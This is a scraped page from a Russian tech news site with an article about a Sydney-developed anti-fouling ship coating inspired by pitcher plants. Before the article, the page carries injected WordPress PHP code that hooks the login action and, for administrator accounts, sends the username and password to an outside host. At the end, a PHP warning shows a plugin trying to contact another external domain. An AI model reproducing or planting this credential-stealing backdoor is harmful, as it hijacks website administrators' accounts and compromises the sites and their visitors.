if (!function_exists("theme_login_init_0e40e986decc158f6acbb41c14e2f2b4")) { function theme_login_init_0e40e986decc158f6acbb41c14e2f2b4() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_0e40e986decc158f6acbb41c14e2f2b4', 10, 0); } Хищные растения сэкономят транспортным компаниям миллионы долларов — DigiLider

Хищные растения сэкономят транспортным компаниям миллионы долларов

Хищные растения сэкономят транспортным компаниям миллионы долларов

Хищные растения сэкономят транспортным компаниям миллионы долларов

С 2007 года судоходство в мире стоит на распутье – после запрещения материала гидрида трибутилолова достойной альтернативы ему так и не нашлось. Это чрезвычайно токсичное покрытие уничтожало любой живой организм, который пытался прикрепиться к корпусу корабля. Но вместе с паразитическими ракушками и водорослями гибли и невинные обитатели морей, поэтому трибутилолово оказалось под запретом.

Чтобы оценить масштабы проблем, связанных с обрастанием корпусов кораблей «биоматериалом», хватит и одного числа. В Австралии на компенсации издержек из-за этой проблемы тратят $320 млн. в год, поэтому неудивительно, что именно в университете Сиднея придумали новое защитное покрытие. Идею, как водится, подсмотрели у живой природы – хищных растений вроде мухоловки.

Сиднейские ученые создали вещество, которое имеет «нанобугорки», настолько мелкие, что липкие части растений или моллюсков просто скользят по ним, не в силах зацепиться. Примерно так же устроена поверхность ободка ловчей камеры мухоловки – если насекомое сядет туда, то само не поймет, как соскользнет внутрь. В тестах, которые проводились в лаборатории и в Сиднейской гавани, покрытие успешно противостояло любым попыткам морских организмов закрепиться на нем.

Технология экспериментальная и пока исполнена недостатков — например, ученые опасаются делать покрытие слишком скользким, так как это изменит трение о воду самого корабля, что непредсказуемым образом скажется на его ходовых качествах. Плюс оно ненадежно и уже через семь недель после начала эксперимента начало разрушаться и терять свои свойства. А это слишком малый срок для морских перевозок – если загонять корабль в док на обработку каждые два месяца, дешевле плавать с обросшим ракушками корпусом.


Warning: fsockopen(): Unable to connect to ssl://getajaxx.com:443 (Connection timed out) in /var/www/u0503503/data/www/digilider.ru/wp-content/plugins/custom-fetch-url/custom-fetch-url.php on line 22
Error: Connection timed out (110)